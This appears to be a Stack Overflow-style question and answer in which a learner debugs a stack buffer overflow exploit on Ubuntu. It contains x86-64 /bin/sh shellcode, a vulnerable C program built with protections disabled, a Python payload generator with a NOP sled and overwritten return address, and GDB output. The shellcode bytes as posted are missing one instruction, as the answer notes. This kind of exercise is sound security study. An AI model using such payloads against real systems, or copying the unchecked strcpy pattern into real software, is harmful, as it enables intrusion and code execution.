# execute a shellcode, /bin/sh

Tags: ubuntu, stack, buffer-overflow, inject, shellcode

I am trying, unsuccessfully, to execute shellcode (`/bin/sh`) from an address on the stack.
I Inject the shellcode to an executable file using a buffer overflow method on an Ubuntu 20.04 64-bit machine.
I hoped that during the execution, a shell will be open….

1. Here is the assembly file that executes `/bin/sh` (from which I took the machine code):

```
global _start

_start: 

    xor rax, rax

    push rax
    
    mov rbx, 0x68732f6e69622f2f
    push rbx
    mov rdi, rsp
    
    push rax
    push rdi
    mov rsi,rsp 
        
    xor rdx, rdx
    add rax, 59
    syscall
```

2. Here is the machine code:

```
\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05
```

3. Here is the C code (`buffer_V8.c`) from which I inject the shellcode:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int buffer(char* input){
    char buffer[256];
    strcpy (buffer,input);
    printf("Hello from buffer!\n");
    return 0;
}

void main (int argc, char *argv[]){
    int local_variable = 1;
    buffer(argv[1]);
    printf("Hello from main!\n");
    exit(0);
}
```

4. This is how I create the executable:

```
gcc -fno-stack-protector -z execstack buffer_V8.c  -o buffer_V8
```

5. Running the executable with a legitimate input, works as expected:

```
$ ./buffer_V8 AAA 
Hello from buffer! 
Hello from main!
```

6. Running the executable with GDB, with long input that overrides the return address, but without the shellcode, works as expected:

Here is the file to create the input:

```py
#!/usr/bin/env python
from struct import *

buffer = ""
buffer += "A"*264
buffer += "B"*6
f = open("input_V1.txt", "w")
f.write(buffer)
f.close()
```

Here is the result of executing with GDB: when the debugger tries to return, it stops with the message:

```
gdb ./buffer_V8 
run $(cat input_V1.txt)  
c
…
Stopped reason: SIGSEGV 
0x0000424242424242 in ?? ()
```

7. Running the executable with GDB, with long input that overrides the return address, including the shellcode, doesn't work as expected:

Here is the file to create the input:

```py
#!/usr/bin/env python
from struct import * 

buffer = "" 
buffer += "\x90"*100    #NOP 
#shell code 
buffer+="\x48\x31\xc0\x50\x48\xbb\x2f\x2f\x62\x69\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05"
buffer += "C"*133
#override the return address with an address in the stack inside the buffer before the shellcode begins. 
buffer += pack("<Q", 0x7fffffffdcf0) 

f = open("input_V4.txt", "w") 
f.write(buffer) 
f.close()
```

Here is the result of executing with GDB:

```
gdb ./buffer_V8
run $(cat input_V4.txt) 
c
  0x7fffffffdd3a:   xor    rdx,rdx
   0x7fffffffdd3d:  add    rax,0x3b
   0x7fffffffdd41:  syscall 
=> **0x7fffffffdd43**:  rex.XB
   0x7fffffffdd44:  rex.XB
   0x7fffffffdd45:  rex.XB
   0x7fffffffdd46:  rex.XB
   0x7fffffffdd47:  rex.XB
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddb8 --> 0x7fffffffddc8 --> 0x0 
0008| 0x7fffffffddc0 --> 0x0 
0016| 0x7fffffffddc8 --> 0x0 
0024| 0x7fffffffddd0 --> 0x7fffffffdee8 --> 0x7fffffffe22f ("/home/albi/Desktop/UMalware/PROJECTS
/Penetration/CH7/zzz")
0032| 0x7fffffffddd8 --> 0x2555550a0 
0040| 0x7fffffffdde0 --> 0x7fffffffdee0 --> 0x2 
0048| 0x7fffffffdde8 --> 0x100000000 
0056| 0x7fffffffddf0 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
**0x00007fffffffdd43** in ?? ()
```

Instead of opening a shell, it looks like the execution stopped after calling `syscall at address 0x7fffffffdd41`.

What went wrong, and how can I perform the execution of the shellcode successfully?

Thanks a lot
Tali

Answer (score 2):

I discovered the bug:

The transition from stage 1: the assembly program,  to stage 2: the machine code, was not complete: one machine code was missing.

Fixing this issue solved every thing!